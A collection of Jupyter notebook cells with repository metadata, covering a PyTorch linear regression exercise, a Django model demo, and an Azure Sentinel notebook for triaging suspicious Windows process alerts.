        self.linear = nn.Linear(input_size, output_size)

    # Prediction
    def forward(self, x):
        yhat = self.linear(x)
        return yhat
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create a model. Use two features: make the input size 2 and the output size 1:
# Create the linear regression model and print the parameters
model = linear_regression(2, 1)
print("The parameters: ", list(model.parameters()))
The parameters: [Parameter containing: tensor([[ 0.6209, -0.1178]], requires_grad=True), Parameter containing: tensor([0.3026], requires_grad=True)]
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create an optimizer object. Set the learning rate to 0.1. Don't forget to enter the model parameters in the constructor.
# Create the optimizer
optimizer = optim.SGD(model.parameters(), lr=0.1)
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create the criterion function that calculates the total loss or cost:
# Create the cost function
criterion = nn.MSELoss()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create a data loader object. Set the batch_size equal to 2:
# Create the data loader
train_loader = DataLoader(dataset=data_set, batch_size=2)
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Train the Model via Mini-Batch Gradient Descent

Run 100 epochs of Mini-Batch Gradient Descent and store the total loss or cost for every iteration. Remember that this is an approximation of the true total loss or cost:
# Train the model
LOSS = []
print("Before Training: ")
Plot_2D_Plane(model, data_set)
epochs = 100

def train_model(epochs):
    for epoch in range(epochs):
        for x, y in train_loader:
            yhat = model(x)
            loss = criterion(yhat, y)
            LOSS.append(loss.item())
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()

train_model(epochs)
print("After Training: ")
Plot_2D_Plane(model, data_set, epochs)

# Plot out the Loss and iteration diagram
plt.plot(LOSS)
plt.xlabel("Iterations ")
plt.ylabel("Cost/total loss ")
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Practice

Create a new model `model1`. Train the model with a batch size of 30 and a learning rate of 0.1, store the loss or total cost in a list `LOSS1`, and plot the results.
# Practice: create model1. Train the model with batch size 30 and learning rate 0.1,
# store the loss in a list <code>LOSS1</code>. Plot the results.

data_set = Data2D()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Double-click here for the solution.

<!-- Your answer is below:
train_loader = DataLoader(dataset = data_set, batch_size = 30)
model1 = linear_regression(2, 1)
optimizer = optim.SGD(model1.parameters(), lr = 0.1)
LOSS1 = []
epochs = 100

def train_model(epochs):
    for epoch in range(epochs):
        for x, y in train_loader:
            yhat = model1(x)
            loss = criterion(yhat, y)
            LOSS1.append(loss.item())
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()

train_model(epochs)
Plot_2D_Plane(model1, data_set)
plt.plot(LOSS1)
plt.xlabel("iterations ")
plt.ylabel("Cost/total loss ")
-->

Use the following validation data to calculate the total loss or cost for both models:
torch.manual_seed(2)

validation_data = Data2D()
Y = validation_data.y
X = validation_data.x
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
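The notebook stops short of showing the validation step; here is a hedged sketch of one way it could be computed, assuming `model`, `model1`, and `criterion` from the cells above are in scope.

```python
# Sketch only: total loss (cost) of each model on the validation data
with torch.no_grad():
    loss_model = criterion(model(X), Y).item()
    loss_model1 = criterion(model1(X), Y).item()

print("Validation cost of model:  ", loss_model)
print("Validation cost of model1: ", loss_model1)
```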
Creating groups

We are going to create a simple group.
group = Group.objects.create(name='My First Group')
group.pk
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
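The notebook assumes `Group`, `Job`, and `SavedCandidate` models are already defined and imported. Below is a hedged sketch of model definitions consistent with the calls used in these cells; the field names are inferred from the notebook, not taken from the original project.

```python
# models.py (hypothetical reconstruction)
from django.db import models

class Job(models.Model):
    title = models.CharField(max_length=255)

class SavedCandidate(models.Model):
    name = models.CharField(max_length=255)

class Group(models.Model):
    name = models.CharField(max_length=255)
    parent_group = models.ForeignKey(
        'self', null=True, blank=True,
        related_name='child_groups', on_delete=models.CASCADE)
    jobs = models.ManyToManyField(Job, blank=True)
    saved_candidates = models.ManyToManyField(SavedCandidate, blank=True)
```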
Now let's create a group that is a child of the first group.
group_child = Group.objects.create(name='Child of (My First Group)', parent_group=group)
group_child.parent_group.name
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Creating jobs

Now that we have a few groups, let's create some jobs to add to the groups.
job_1 = Job.objects.create(title='Job 1')
job_2 = Job.objects.create(title='Job 2')
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Adding jobs to a group
group.jobs.add(job_1)
group_child.jobs.add(job_2)
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
OK, now let's add some saved candidates to a new group.
candidate_1 = SavedCandidate.objects.create(name='Candidate 1')
candidate_2 = SavedCandidate.objects.create(name='Candidate 2')

group_2 = Group.objects.create(name='Group 2')
group_2_child = Group.objects.create(name='Group 2 Child', parent_group=group_2)

group_2_child.saved_candidates.add(candidate_1)
group_2_child.saved_candidates.add(candidate_2)
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Let's loop over all the groups and display the name, jobs, and saved candidates for each.
for group in Group.objects.all():
    print("Group: {}".format(group.name))

    print("jobs: {}".format(group.jobs.count()))
    for job in group.jobs.all():
        print(job.title)

    print("saved candidates: {}".format(group.saved_candidates.count()))
    for candidate in group.saved_candidates.all():
        print(candidate.name)

    print("\n")
Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 2 Candidate 1 Candidate 2 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 2 Candidate 1 Candidate 2 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 0 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 0 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 2 Candidate 1 Candidate 2
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
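As a side note (not part of the original notebook), the loop above issues extra queries for each group's related objects; Django's `prefetch_related` can load them up front in a constant number of queries.

```python
# Sketch only: same traversal, but related jobs and saved candidates are prefetched.
for group in Group.objects.prefetch_related('jobs', 'saved_candidates'):
    print(group.name)
    print([job.title for job in group.jobs.all()])          # uses the prefetched cache
    print([c.name for c in group.saved_candidates.all()])   # uses the prefetched cache
```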
Title: Alert Investigation (Windows Process Alerts)

**Notebook Version:** 1.0
**Python Version:** Python 3.6 (including Python 3.6 - AzureML)
**Required Packages**: kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, ipywidgets, ipython, scikit_learn
**Platforms Supported**:
- Azure Notebooks Free Compute
- Azure Notebooks DSVM
- OS Independent

**Data Sources Required**:
- Log Analytics - SecurityAlert, SecurityEvent (EventIDs 4688 and 4624/25)
- (Optional) - VirusTotal (with API key)

Description:
This notebook is intended for triage and investigation of security alerts. It is specifically targeted at alerts triggered by suspicious process activity on Windows hosts. Some of the sections will work on other types of alerts, but this is not guaranteed.

Table of Contents
- [Setup and Authenticate](#setup)
- [Get Alerts List](#getalertslist)
- [Choose an Alert to investigate](#enteralertid)
  - [Extract Properties and entities from alert](#extractalertproperties)
  - [Entity Graph](#entitygraph)
- [Related Alerts](#related_alerts)
- [Session Process Tree](#processtree)
  - [Process Timeline](#processtimeline)
- [Other Process on Host](#process_clustering)
- [Check for IOCs in Commandline](#cmdlineiocs)
  - [VirusTotal lookup](#virustotallookup)
- [Alert command line - Occurrence on other hosts in subscription](#cmdlineonotherhosts)
- [Host Logons](#host_logons)
  - [Alert Account](#logonaccount)
  - [Failed Logons](#failed_logons)
- [Appendices](#appendices)
  - [Saving data to Excel](#appendices)

[Contents](#toc)

Setup
1. Make sure that you have installed the packages specified in the setup (uncomment the lines to execute)
2. There are some manual steps up to selecting the alert ID. After this, most of the notebook can be executed sequentially
3. Major sections should be executable independently (e.g. Alert Command line and Host Logons can be run skipping Session Process Tree)

Install Packages
The first time this cell runs for a new Azure Notebooks project or local Python environment it will take several minutes to download and install the packages. In subsequent runs it should run quickly and confirm that package dependencies are already installed. Unless you want to upgrade the packages, you can feel free to skip execution of the next cell.

If you see any import failures (```ImportError```) in the notebook, please re-run this cell and answer 'y', then re-run the cell where the failure occurred. Note you may see some warnings about package incompatibility with certain packages. This does not affect the functionality of this notebook, but you may need to upgrade the packages producing the warnings to a more recent version.
import sys
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)

MIN_REQ_PYTHON = (3, 6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

# Package Installs - try to avoid if they are already installed
try:
    import msticpy.sectools as sectools
    import Kqlmagic

    print('If you answer "n" this cell will exit with an error in order to avoid the pip install calls,')
    print('This error can safely be ignored.')
    resp = input('msticpy and Kqlmagic packages are already loaded. Do you want to re-install? (y/n)')
    if resp.strip().lower() != 'y':
        sys.exit('pip install aborted - you may skip this error and continue.')
    else:
        print('After installation has completed, restart the current kernel and run '
              'the notebook again skipping this cell.')
except ImportError:
    pass

print('\nPlease wait. Installing required packages. This may take a few minutes...')
!pip install git+https://github.com/microsoft/msticpy --upgrade --user
!pip install Kqlmagic --no-cache-dir --upgrade --user

print('\nTo ensure that the latest versions of the installed libraries '
      'are used, please restart the current kernel and run '
      'the notebook again skipping this cell.')
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Import Python Packages

Get WorkspaceId

To find your Workspace Id, go to [Log Analytics](https://ms.portal.azure.com/blade/HubsExtension/Resources/resourceType/Microsoft.OperationalInsights%2Fworkspaces). Look at the workspace properties to find the ID.
# Imports
import sys
MIN_REQ_PYTHON = (3, 6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

import numpy as np
from IPython import get_ipython
from IPython.display import display, HTML, Markdown
import ipywidgets as widgets

import matplotlib.pyplot as plt
import seaborn as sns
import networkx as nx
sns.set()

import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 100)

import msticpy.sectools as sectools
import msticpy.nbtools as mas
import msticpy.nbtools.kql as qry
import msticpy.nbtools.nbdisplay as nbdisp

# Some of our dependencies (networkx) still use deprecated Matplotlib
# APIs - we can't do anything about it so suppress them from view
from matplotlib import MatplotlibDeprecationWarning
warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)

import os
from msticpy.nbtools.wsconfig import WorkspaceConfig

ws_config_file = 'config.json'

WORKSPACE_ID = None
TENANT_ID = None
try:
    ws_config = WorkspaceConfig(ws_config_file)
    display(Markdown(f'Read Workspace configuration from local config.json for workspace **{ws_config["workspace_name"]}**'))
    for cf_item in ['tenant_id', 'subscription_id', 'resource_group', 'workspace_id', 'workspace_name']:
        display(Markdown(f'**{cf_item.upper()}**: {ws_config[cf_item]}'))
    if ('cookiecutter' not in ws_config['workspace_id'] or
            'cookiecutter' not in ws_config['tenant_id']):
        WORKSPACE_ID = ws_config['workspace_id']
        TENANT_ID = ws_config['tenant_id']
except:
    pass

if not WORKSPACE_ID or not TENANT_ID:
    display(Markdown('**Workspace configuration not found.**\n\n'
                     'Please go to your Log Analytics workspace, copy the workspace ID'
                     ' and/or tenant Id and paste here.<br> '
                     'Or read the workspace_id from the config.json in your Azure Notebooks project.'))
    ws_config = None
    ws_id = mas.GetEnvironmentKey(env_var='WORKSPACE_ID',
                                  prompt='Please enter your Log Analytics Workspace Id:',
                                  auto_display=True)
    ten_id = mas.GetEnvironmentKey(env_var='TENANT_ID',
                                   prompt='Please enter your Log Analytics Tenant Id:',
                                   auto_display=True)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Authenticate to Log Analytics

If you are using user/device authentication, run the following cell.
- Click the 'Copy code to clipboard and authenticate' button.
- This will pop up an Azure Active Directory authentication dialog (in a new tab or browser window). The device code will have been copied to the clipboard.
- Select the text box and paste (Ctrl-V/Cmd-V) the copied value.
- You should then be redirected to a user authentication page where you should authenticate with a user account that has permission to query your Log Analytics workspace.

Use the following syntax if you are authenticating using an Azure Active Directory AppId and Secret:
```
%kql loganalytics://tenant(aad_tenant).workspace(WORKSPACE_ID).clientid(client_id).clientsecret(client_secret)
```
instead of
```
%kql loganalytics://code().workspace(WORKSPACE_ID)
```

Note: you may occasionally see a JavaScript error displayed at the end of the authentication - you can safely ignore this. On successful authentication you should see a ```popup schema``` button.
if not WORKSPACE_ID or not TENANT_ID:
    try:
        WORKSPACE_ID = ws_id.value
        TENANT_ID = ten_id.value
    except NameError:
        raise ValueError('No workspace or Tenant Id.')

mas.kql.load_kql_magic()

%kql loganalytics://code().tenant(TENANT_ID).workspace(WORKSPACE_ID)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](#toc)

Get Alerts List

Specify a time range to search for alerts. Once this is set, run the following cell to retrieve any alerts in that time window. You can change the time range and re-run the queries until you find the alerts that you want.
alert_q_times = mas.QueryTime(units='day', max_before=20, before=5, max_after=1)
alert_q_times.display()

alert_counts = qry.list_alerts_counts(provs=[alert_q_times])
alert_list = qry.list_alerts(provs=[alert_q_times])
print(len(alert_counts), ' distinct alert types')
print(len(alert_list), ' distinct alerts')

display(HTML('<h2>Alert Timeline</h2>'))
nbdisp.display_timeline(data=alert_list, source_columns=['AlertName', 'CompromisedEntity'], title='Alerts', height=200)

display(HTML('<h2>Top alerts</h2>'))
alert_counts.head(20)  # remove '.head(20)' to see the full list grouped by AlertName
12 distinct alert types 51 distinct alerts
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
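As an optional aside (not in the original notebook), `alert_list` is a pandas DataFrame, so it can also be narrowed down directly before picking an alert. The column names below (`AlertName`, `CompromisedEntity`) are assumed from the timeline call above.

```python
# Sketch only: filter the retrieved alerts by a substring of the alert name
suspicious = alert_list[alert_list['AlertName'].str.contains('process', case=False, na=False)]
suspicious[['AlertName', 'CompromisedEntity']].head()
```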
[Contents](#toc)

Choose Alert to Investigate

Either pick an alert from a list of retrieved alerts or paste the SystemAlertId into the text box in the following section.

Select alert from list

As you select an alert, the main properties will be shown below the list. Use the filter box to narrow down your search to any substring in the AlertName.
alert_select = mas.AlertSelector(alerts=alert_list, action=nbdisp.display_alert)
alert_select.display()
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Or paste in an alert ID and fetch it

**Skip this if you selected from the above list**
# Allow alert to be selected
# Allow subscription to be selected
get_alert = mas.GetSingleAlert(action=nbdisp.display_alert)
get_alert.display()
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](#toc)

Extract properties and entities from Alert

This section extracts the alert information and entities into a SecurityAlert object, allowing us to query the properties more reliably. In particular, we use the alert to automatically provide parameters for queries and UI elements.

Subsequent queries will use properties like the host name and derived properties such as the OS family (Linux or Windows) to adapt the query. Query time selectors like the one above will also default to an origin time that matches the alert selected.

The alert view below shows all of the main properties of the alert plus the extended property dictionary (if any) and JSON representations of the Entity.
# Extract entities and properties into a SecurityAlert class
if alert_select.selected_alert is None and get_alert.selected_alert is None:
    sys.exit("Please select an alert before executing remaining cells.")

if get_alert.selected_alert is not None:
    security_alert = mas.SecurityAlert(get_alert.selected_alert)
elif alert_select.selected_alert is not None:
    security_alert = mas.SecurityAlert(alert_select.selected_alert)

mas.disp.display_alert(security_alert, show_entities=True)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](#toc)

Entity Graph

Depending on the type of alert, there may be one or more entities attached as properties. Entities are things like Host, Account, IpAddress, Process, etc. - essentially the 'nouns' of security investigation. Events and alerts are the things that link them in actions, so they can be thought of as the verbs. Entities are often related to other entities - for example, a process will usually have a related file entity (the process image) and an Account entity (the context in which the process was running). Endpoint alerts typically always have a host entity (which could be a physical or virtual machine).

Plot using Networkx/Matplotlib
# Draw the graph using Networkx/Matplotlib
%matplotlib inline
alertentity_graph = mas.create_alert_graph(security_alert)
nbdisp.draw_alert_entity_graph(alertentity_graph, width=15)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](#toc)

Related Alerts

For a subset of entities in the alert, we can search for any alerts that have that entity in common. Currently this query looks for alerts that share the same Host, Account or Process and lists them below.

**Notes:**
- Some alert types do not include all of these entity types.
- The original alert will be included in the "Related Alerts" set if it occurs within the query time boundary set below.

The query time boundaries default to a longer period than when searching for the alert. You can extend the time boundary searched before or after the alert time. If the widget doesn't support the time boundary that you want, you can change the max_before and max_after parameters in the call to QueryTime below to extend the possible time boundaries.
# set the origin time to the time of our alert
query_times = mas.QueryTime(units='day',
                            origin_time=security_alert.TimeGenerated,
                            max_before=28, max_after=1, before=5)
query_times.display()

related_alerts = qry.list_related_alerts(provs=[query_times, security_alert])

if related_alerts is not None and not related_alerts.empty:
    host_alert_items = related_alerts\
        .query('host_match == @True')[['AlertType', 'StartTimeUtc']]\
        .groupby('AlertType').StartTimeUtc.agg('count').to_dict()
    acct_alert_items = related_alerts\
        .query('acct_match == @True')[['AlertType', 'StartTimeUtc']]\
        .groupby('AlertType').StartTimeUtc.agg('count').to_dict()
    proc_alert_items = related_alerts\
        .query('proc_match == @True')[['AlertType', 'StartTimeUtc']]\
        .groupby('AlertType').StartTimeUtc.agg('count').to_dict()

    def print_related_alerts(alertDict, entityType, entityName):
        if len(alertDict) > 0:
            print('Found {} different alert types related to this {} (\'{}\')'
                  .format(len(alertDict), entityType, entityName))
            for (k, v) in alertDict.items():
                print('    {}, Count of alerts: {}'.format(k, v))
        else:
            print('No alerts for {} entity \'{}\''.format(entityType, entityName))

    print_related_alerts(host_alert_items, 'host', security_alert.hostname)
    print_related_alerts(acct_alert_items, 'account',
                         security_alert.primary_account.qualified_name
                         if security_alert.primary_account else None)
    print_related_alerts(proc_alert_items, 'process',
                         security_alert.primary_process.ProcessFilePath
                         if security_alert.primary_process else None)
    nbdisp.display_timeline(data=related_alerts, source_columns=['AlertName'], title='Alerts', height=100)
else:
    display(Markdown('No related alerts found.'))
Found 8 different alert types related to this host ('msticalertswin1') Detected potentially suspicious use of Telegram tool, Count of alerts: 2 Detected the disabling of critical services, Count of alerts: 2 Digital currency mining related behavior detected, Count of alerts: 2 Potential attempt to bypass AppLocker detected, Count of alerts: 4 Security incident detected, Count of alerts: 2 Security incident with shared process detected, Count of alerts: 3 Suspicious system process executed, Count of alerts: 2 Suspiciously named process detected, Count of alerts: 2 Found 13 different alert types related to this account ('msticalertswin1\msticadmin') An history file has been cleared, Count of alerts: 12 Azure Security Center test alert (not a threat), Count of alerts: 13 Detected potentially suspicious use of Telegram tool, Count of alerts: 2 Detected the disabling of critical services, Count of alerts: 2 Digital currency mining related behavior detected, Count of alerts: 2 New SSH key added, Count of alerts: 13 Possible credential access tool detected, Count of alerts: 11 Possible suspicious scheduling tasks access detected, Count of alerts: 1 Potential attempt to bypass AppLocker detected, Count of alerts: 3 Suspicious Download Then Run Activity, Count of alerts: 13 Suspicious binary detected, Count of alerts: 13 Suspicious system process executed, Count of alerts: 2 Suspiciously named process detected, Count of alerts: 2 Found 2 different alert types related to this process ('c:\w!ndows\system32\suchost.exe') Digital currency mining related behavior detected, Count of alerts: 2 Suspiciously named process detected, Count of alerts: 2
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Show these related alerts on a graphThis should indicate which entities the other alerts are related to. With a lot of alerts the graph can become unreadable; use the matplotlib interactive zoom control to zoom in to part of the graph.
# Draw a graph of this (add to entity graph) %matplotlib notebook %matplotlib inline if related_alerts is not None and not related_alerts.empty: rel_alert_graph = mas.add_related_alerts(related_alerts=related_alerts, alertgraph=alertentity_graph) nbdisp.draw_alert_entity_graph(rel_alert_graph, width=15) else: display(Markdown('No related alerts found.'))
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Browse List of Related AlertsSelect an alert to view its details. If you want to investigate an alert, copy its *SystemAlertId* property and open a new instance of this notebook to investigate it.
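Once you have picked an alert with the selector in the next cell, a small sketch like the following (hypothetical, not part of the original walk-through) prints the id so you can paste it into a fresh notebook instance.
```
# Hypothetical helper cell - run after selecting an alert below
if 'related_alert' in globals():
    print(related_alert.SystemAlertId)
```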
def disp_full_alert(alert): global related_alert related_alert = mas.SecurityAlert(alert) nbdisp.display_alert(related_alert, show_entities=True) if related_alerts is not None and not related_alerts.empty: related_alerts['CompromisedEntity'] = related_alerts['Computer'] print('Selected alert is available as \'related_alert\' variable.') rel_alert_select = mas.AlertSelector(alerts=related_alerts, action=disp_full_alert) rel_alert_select.display() else: display(Markdown('No related alerts found.'))
Selected alert is available as 'related_alert' variable.
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Get Process TreeIf the alert has a process entity this section tries to retrieve the entire process tree to which that process belongs.Notes:- The alert must have a process entity- Only processes started within the query time boundary will be included- Ancestor and descendant processes are retrieved to two levels (i.e. the parent and grandparent of the alert process plus any child and grandchild processes).- Sibling processes are the processes that share the same parent as the alert process- This can be a long-running query, especially if a wide time window is used! Caveat Emptor!The source (alert) process is shown in red.What's shown for each process:- Each process line is indented according to its position in the tree hierarchy- Top line fields: - \[relationship to source process:lev - where lev is the number of hops away from the source process\] - Process creation date-time (UTC) - Process Image path - PID - Process Id - SubjSess - the session Id of the process spawning the new process - TargSess - the new session Id if the process is launched in another context/session. If 0/0x0 then the process is launched in the same session as its parent- Second line fields: - Process command line - Account - name of the account context in which the process is running
# set the origin time to the time of our alert query_times = mas.QueryTime(units='minute', origin_time=security_alert.origin_time) query_times.display() from msticpy.nbtools.query_defns import DataFamily if security_alert.data_family != DataFamily.WindowsSecurity: raise ValueError('The remainder of this notebook currently only supports Windows. ' 'Linux support is in development but not yet implemented.') def extract_missing_pid(security_alert): for pid_ext_name in ['Process Id', 'Suspicious Process Id']: pid = security_alert.ExtendedProperties.get(pid_ext_name, None) if pid: return pid def extract_missing_sess_id(security_alert): sess_id = security_alert.ExtendedProperties.get('Account Session Id', None) if sess_id: return sess_id for session in [e for e in security_alert.entities if e['Type'] == 'host-logon-session' or e['Type'] == 'hostlogonsession']: return session['SessionId'] if (security_alert.primary_process): # Do some patching up if the process entity doesn't have a PID pid = security_alert.primary_process.ProcessId if not pid: pid = extract_missing_pid(security_alert) if pid: security_alert.primary_process.ProcessId = pid else: raise ValueError('Could not find the process Id for the alert process.') # Do the same if we can't find the account logon ID if not security_alert.get_logon_id(): sess_id = extract_missing_sess_id(security_alert) if sess_id and security_alert.primary_account: security_alert.primary_account.LogonId = sess_id else: raise ValueError('Could not find the session Id for the alert process.') # run the query process_tree = qry.get_process_tree(provs=[query_times, security_alert]) if len(process_tree) > 0: # Print out the text view of the process tree nbdisp.display_process_tree(process_tree) else: display(Markdown('No processes were returned so cannot obtain a process tree.' '\n\nSkip to [Other Processes](#process_clustering) later in the' ' notebook to retrieve all processes')) else: display(Markdown('This alert has no process entity so cannot obtain a process tree.' '\n\nSkip to [Other Processes](#process_clustering) later in the' ' notebook to retrieve all processes')) process_tree = None
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Process TimeLineThis shows each process in the process tree on a timeline view. Labelling of individual processes is very performance intensive and often results in nothing being displayed at all! Besides, for large numbers of processes it would likely result in an unreadable mess. Your main tools for negotiating the timeline are the Hover tool (toggled on and off by the speech bubble icon) and the wheel-zoom and pan tools (the former is an icon with an ellipse and a magnifying glass, the latter is the crossed-arrows icon). The wheel zoom is particularly useful. As you hover over each process it will display the image name, PID and commandline. Also shown on the graphic is the timestamp line of the source/alert process.
# Show timeline of events if process_tree is not None and not process_tree.empty: nbdisp.display_timeline(data=process_tree, alert=security_alert, title='Alert Process Session', height=250)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Other Processes on Host - ClusteringSometimes you don't have a source process to work with. Other times it's just useful to see what else is going on on the host. This section retrieves all processes on the host within the time bounds set in the query times widget.You can display the raw output of this by looking at the *processes_on_host* dataframe. Just copy this into a new cell and hit Ctrl-Enter.Usually though, the results return a lot of very repetitive and uninteresting system processes, so we attempt to cluster these to make the view easier to negotiate. To do this we process the raw event list output to extract a few features that render strings (such as the commandline) into numerical values. The default below uses the following features:- commandLineTokensFull - this is a count of common delimiters in the commandline (given by this regex r'[\s\-\\/\.,"\'|&:;%$()]'). The aim of this is to capture the commandline structure while ignoring variations on what is essentially the same pattern (e.g. temporary path GUIDs, target IP or host names, etc.)- pathScore - this sums the ordinal (character) value of each character in the path (so /bin/bash and /bin/bosh would have similar scores).- isSystemSession - 1 if this is a root/system session, 0 otherwise.Then we run a clustering algorithm (DBSCAN in this case) on the process list. The result groups similar (noisy) processes together and leaves unique process patterns as single-member clusters. Clustered Processes (i.e. processes that have a cluster size > 1)
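As a rough illustration of how such features could be computed, here is a small sketch. These helper functions are hypothetical stand-ins; the real versions come from msticpy.sectools.eventcluster.add_process_features used in the next cell.
```
import re

# Hypothetical re-implementations of the two string features described above
DELIMS = re.compile(r'[\s\-\\/\.,"\'|&:;%$()]')

def commandline_tokens_full(commandline):
    # count of common delimiters - captures command line *structure*
    return len(DELIMS.findall(commandline))

def path_score(path):
    # sum of character ordinals - similar paths get similar scores
    return sum(ord(c) for c in path)

print(commandline_tokens_full(r'reg.exe add HKLM\Software\Test /v X /d 1'))
print(path_score(r'c:\windows\system32\net.exe'))
print(path_score(r'e:\windows\system32\net.exe'))
```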
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features processes_on_host = qry.list_processes(provs=[query_times, security_alert]) if processes_on_host is not None and not processes_on_host.empty: feature_procs = add_process_features(input_frame=processes_on_host, path_separator=security_alert.path_separator) # you might need to play around with the max_cluster_distance parameter. # decreasing this gives more clusters. (clus_events, dbcluster, x_data) = dbcluster_events(data=feature_procs, cluster_columns=['commandlineTokensFull', 'pathScore', 'isSystemSession'], max_cluster_distance=0.0001) print('Number of input events:', len(feature_procs)) print('Number of clustered events:', len(clus_events)) clus_events[['ClusterSize', 'processName']][clus_events['ClusterSize'] > 1].plot.bar(x='processName', title='Process names with Cluster > 1', figsize=(12,3)); else: display(Markdown('Unable to obtain any processes for this host. This feature' ' is currently only supported for Windows hosts.' '\n\nIf this is a Windows host skip to [Host Logons](#host_logons)' ' later in the notebook to examine logon events.'))
Number of input events: 190 Number of clustered events: 24
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Variability in Command Lines and Process NamesThe top chart shows the variability of command line content for a given process name. The wider the box, the more instances were found with different command line structure. Note: the 'structure' in this case is measured by the number of tokens or delimiters in the command line and does not look at content differences. This is done so that commonly varying instances of the same command line are grouped together.For example `updatepatch host1.mydom.com` and `updatepatch host2.mydom.com` will be grouped together.The second chart shows the variability in executable path. This does compare content so `c:\windows\system32\net.exe` and `e:\windows\system32\net.exe` are treated as distinct. You would normally not expect to see any variability in this chart unless you have multiple copies of the same-named executable or an executable is trying to masquerade as another well-known binary.
# Looking at the variability of commandlines and process image paths import seaborn as sns sns.set(style="darkgrid") if processes_on_host is not None and not processes_on_host.empty: proc_plot = sns.catplot(y="processName", x="commandlineTokensFull", data=feature_procs.sort_values('processName'), kind='box', height=10) proc_plot.fig.suptitle('Variability of Commandline Tokens', x=1, y=1) proc_plot = sns.catplot(y="processName", x="pathLogScore", data=feature_procs.sort_values('processName'), kind='box', height=10, hue='isSystemSession') proc_plot.fig.suptitle('Variability of Path', x=1, y=1);
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
